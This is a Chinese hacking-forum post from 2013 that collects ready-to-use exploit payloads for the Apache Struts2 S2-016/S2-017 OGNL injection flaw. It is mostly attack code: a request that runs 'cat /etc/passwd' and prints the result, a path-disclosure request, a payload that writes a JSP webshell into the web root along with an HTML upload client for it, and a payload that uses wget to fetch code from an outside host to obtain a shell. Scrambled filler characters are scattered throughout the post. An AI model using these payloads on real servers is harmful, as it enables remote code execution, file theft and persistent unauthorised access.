中国网络渗透测试联盟
标题:
Struts2 S2-016/S2-017漏洞执行代码
[打印本页]
作者:
admin
时间:
2013-7-18 23:03
标题:
Struts2 S2-016/S2-017漏洞执行代码
大家都发了,,我就整理了一下。友情提示,自己小命比shell重要哦。。
1 ?9 a- D/ S0 S) i; ] E
# Q" k: F1 }. K. V7 a
喜欢就点一下感谢吧^_^
5 H; Y7 T7 v7 a9 Q
) e1 R) ^ ?( l
带回显命令执行:
4 ~; h% @8 W0 x2 l: k
2 F C( [6 `6 v
http://www.example.com/struts2-blank/example/X.action?redirect:
${%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b),%23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
9 h3 G4 O R( s- O8 P; w) E# M; M/ @
; {+ \! a2 |7 z- Q) R3 t2 |+ T8 T
9 T0 o& p* y5 K
+ n5 ~/ e9 g9 j' B' ~
$ p' J$ ` X1 T( H/ d1 F( }
; \, N7 O/ R/ y3 {
$ O& X" l3 D, g. Z+ R2 a$ p
+ g7 f' L, u L* N
爆路径:
: X6 }5 [. Q1 r+ v0 W
: ~ Y3 }+ b8 P O7 [ }" l
http://www.example.com/struts2-b ... 8%29.close%28%29%7D
1 G/ Q5 |0 e" Y* I) n" W/ b h/ K
; {/ z6 S+ l# P n+ T, Z
% }2 V- r+ g; t* b5 @
9 y t% z/ I3 O, j' `
! S1 b; r* K6 A! n x
% Q; r1 z" a5 E8 ^+ c
写文件:
* X6 u! E6 ^' M9 H
1 j' K0 m$ @8 g2 b$ z
http://www.example.com/struts2-blank/example/X.action?redirect:
${
% Y: X1 u+ ~- y }
: r, n6 ]$ m6 `/ L o" K' W! r
%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),
$ f( U E: g, d+ I. l4 M
) H, G2 l J5 ~; O* ^# f3 L+ P
%23p%3d(%23req.getRealPath(%22/%22)%2b%22css3.jsp%22).replaceAll("\\\\", "/"),
* m P V/ g! D( l: u
: @, e5 O w& B9 i4 D* n4 c
new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()
2 @$ [5 [ |( M0 H) A/ X: z
: \/ a$ {4 J$ l3 p
}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e
# C# l. x) l* t' Q4 \( ^" |
& @4 Z M+ }5 L
! p7 p0 T0 e! A" C# a$ U
* b2 q1 R. {5 I8 j5 @ X
写入的文件内容:
5 o/ A$ k2 s) R0 z' d& E
* s7 a( @2 {) z" \
<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>
" e% S5 ^6 O. e( ]
! y) }% X+ b2 y! p' T" B8 n4 f0 k
其实就是一个jsp的小马,需要客户端配合
, q0 c/ r# Y. l2 @) J& ]+ F! ^
0 P# ]8 D: m# D2 B
函数f是文件名,t是内容
& h( t: h/ J' ]
: {' E# ? N3 ~* G; g# v
客户端:
- s4 Y" h$ `% C" P
1 U5 h: @- e( z
<form action="http://www.example.com/struts2-blank/example/css3.jsp?f=fjp.jsp" method="post">
. i9 G' a8 @; k2 O/ a; k" Y" l
/ [" t& b/ p0 C! C2 `4 O
<textarea name=t cols=120 rows=10 width=45>your code</textarea>
& n% ]9 X+ K, r& j; s
2 W4 }/ b9 S. \1 C6 w
<center>
. j) m* \$ F0 X. R
) q# e* c' o; L( I- H$ l
& k5 o. X% k. e& w5 z
* I) g! g2 m+ M: ]" I0 ?
<input type=submit value="提交">
' j* @0 t/ O: C9 l% z3 `
6 E- m4 U& p: z8 V. l
</form>
5 g1 g# e8 E0 U2 N3 D+ B" F0 g' j8 T
" Z. E: J8 ] R+ O
就在当前目录建立一个fjp.jsp
1 ?% M; r% H0 C* N
7 v' f, [/ Q3 F& t" F. D2 N
shell:
http://www.example.com/struts2-blank/example/fjp.jsp
$ V+ B% z! H3 }+ L& k: {9 z
4 H2 G+ N# g b+ G: h$ C* S
! \0 x# O3 Y Y4 O
. G3 _3 v/ L- I7 |; a
还有@园长的一个客户端:
' f& |: C" R# W9 V- J7 \ i
" C* `1 Z1 O R8 ]+ y" `. W: N. w9 i7 `4 r
<html>
0 r/ H& Q: w9 q! U" `: I; ~* K
]( u6 \5 {! x( C2 K0 |+ Y
<head>
3 P8 C$ r- a% _! P6 W( M
7 D( i6 G3 S3 C9 ], ]+ u# L
<meta http-equiv="content-type" content="text/html;charset=utf-8">
+ A. b- g& ^% @' g: k4 P; P
1 X' E: {0 V/ H/ C& w4 X8 ]
<title>jsp-园长</title>
; w$ K( |4 ]5 W+ S2 j
) P/ p/ ?4 v; n
</head>
; F7 y" W4 Y/ V# W9 T
+ ^- L7 B( {1 x- z0 H# u! m+ l
<style>
2 A$ w" `4 h Q$ ?
: w' u: p" k! i5 i# h0 e
.main{width:980px;height:600px;margin:0 auto;}
! K! U- S e/ Z w7 U
0 Q. _* `3 ~. q1 A$ I0 t8 r
.url{width:300px;}
5 m/ w5 Y! m) O$ N7 w
a1 Q2 q) K& q# p/ [- m: P
.fn{width:60px;}
9 }, F" x# g) `2 q& R- r* `
, j5 P" L8 E8 w7 d! }5 x7 C+ ]
.content{width:80%;height:60%;}
2 @* g3 o* L8 N1 f3 E' o
6 W: y v3 }: e9 p6 r/ `- J
</style>
# m" m; Q& j5 t G
9 s; z! y9 Q, r3 |
<script>
* y- f0 m6 b7 i0 p6 w
5 ]- x$ o- \+ N
function upload(){
( r* U! [0 y. K O8 N0 o9 b9 s7 |/ l
2 s# Y1 @" G, a; ~" ]( v5 y
var url = document.getElementById('url').value,
4 j# k5 C& d1 X
$ B% K3 I" K( ] K: C3 \* d' b
content = document.getElementById('content').value,
( q! F0 p/ @/ r% m' F2 J. `9 {% H
! u) d Y2 k8 b2 o& c( h: D
fileName = document.getElementById('fn').value,
. y& g2 p) h2 m) z2 j; |
1 K, Y% P1 Z) M0 |, y9 A
form = document.getElementById('fm');
/ L, m# r4 {; p. R8 V6 b9 ^+ \
5 d1 m" r' T f5 E5 ` J# _7 i
if(url.length == 0){
3 i, |$ z0 d$ k- E2 b1 S3 D
6 `* k3 s- d5 J5 s
alert("Url not allowd empty!");
0 W6 L: c/ A) @
& S; C) w) E: P( c1 S! U! I; ?
return ;
# y" h/ L; y1 I8 O8 x, V
; v7 d; U$ y# I. d8 Z
}
+ |2 v2 r/ M% ?. z, j( |+ M
8 P' F) B* i; [6 ]) |* U
if(content.length == 0){
0 G! X; L, t, @' A" a
, o% s) G, K/ X+ \, n X" g- \! @
alert("Content not allowd empty!");
2 q. T# b7 C: o0 p
$ c: S! c& ?8 a7 f, O
return ;
' G" P: O" N' g* p
% R6 {5 J# i. w2 Z9 ^* v: |
}
' |% v2 e$ b: [/ q; f& ^6 F2 z
7 t) o' o, ~8 }1 v% a: P
if(fileName.length == 0){
& S6 E( P$ Y- ]/ \
7 o8 J4 m9 t6 J- O0 h
alert("FileName not allowd empty!");
3 ~" Q3 j/ R: u+ c8 |7 e
6 x% V4 _1 f6 u, u
return ;
5 Y# e- ?1 r& C0 I, ^# ~( R. g. N) x
5 d( |: L& q5 r) J" t* ]$ y
}
4 E% L* r8 C/ W, Y
% f) }. B; }! G+ d5 R
form.action = url;
& {: h; P5 v7 v0 n2 L2 b; q* L
3 y9 W* H' p& X6 E. G0 d1 ^! l: C
form.submit();
* b: ]( y( K" a
' p% S3 C0 l# s. b+ {2 M9 I$ {. E
}
, @% U. v5 n1 c
) [+ V! {# B6 N6 J1 ]1 t
</script>
6 r. L3 ~$ w$ s' @
3 @. e$ l# Y5 }: ]/ X; v
<body>
r- w) i, Z( H; c r/ t! n
- T# h" a$ {4 w% ^, n g- @
<div class="main">
2 G# [/ h: D0 `. P5 A
8 ?5 H/ ?) V1 S$ @: p3 [$ e
<form id="fm" method="post">
0 J/ [0 |: A/ Z+ \# e
7 j: U3 Y4 {/ [7 G/ [. H+ s
URL:<input type="text" value="http://localhost/Struts2/css3.jsp" class="url" id="url"/>
/ k% a' ^5 T6 X8 x" S2 R& K* v8 ?
l3 U& g) s' V$ l4 v! x9 s" F
FileName:<input type="text" name="f" value="css.jsp" class="fn" id="fn" />
- `/ d; }) |4 G/ Y' E1 ]4 a
) y8 P; E( M+ i# Y+ y! J. g0 i
<a href="javascript:upload();">Upload</a>
9 c$ V( P& X' o. o4 [5 X; H
8 e6 m! X9 T* N6 b
: P: u# E( ]6 ~7 {7 @
8 A" z" O, {9 \
<textarea id="content" class="content" name="t" ></textarea>
% e) v0 \7 Q4 F0 D) R& ?- d
* E! n, M4 b6 ^# M- z0 d
</form>
! ]6 V& _& O3 U* S
5 K' M9 M5 l5 y# c: {
</div>
9 I) c2 y0 B) x+ k
( ^: a# f7 o( ]+ x0 K
</body>
7 q1 e0 A+ j% f* y, I
3 E6 P& s7 k B) |
</html>
# r! E1 l; C* O' n
7 U; J& V; B1 t6 [) ~0 Q
8 O8 K! Y- {) Z- l& }
, j/ i5 z- O/ {; g3 ^
还有@X发的一个wget的getshell
- [2 |' [ Y8 M$ q1 N7 h
7 w0 v# H0 ^& c. e! r. F% e
?redirect
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}
) S X/ _( U; g4 t9 L
0 b' K3 j/ x( j; U6 _) r# J" N
)).start(),%23b%3d%23a.getInputStream(),%23c%3dnew java.io.InputStreamReader(%23b), %23d%3dnew java.io.BufferedReader(%23c),%23e%3dnew char[50000],%23d.read(%23e), %23piaoye%3d%23context.get ('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23piaoye.getWriter().println (%23e),%23piaoye.getWriter().flush(),%23piaoye.getWriter().close()}
/ V& N. F+ T% {. B( ?
复制代码
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2
{%23a%3d(new java.lang.ProcessBuilder(new java.lang.String[]{'wget','http://www.url.com/xx.txt','- O','/root/1.jsp'}) S X/ _( U; g4 t9 L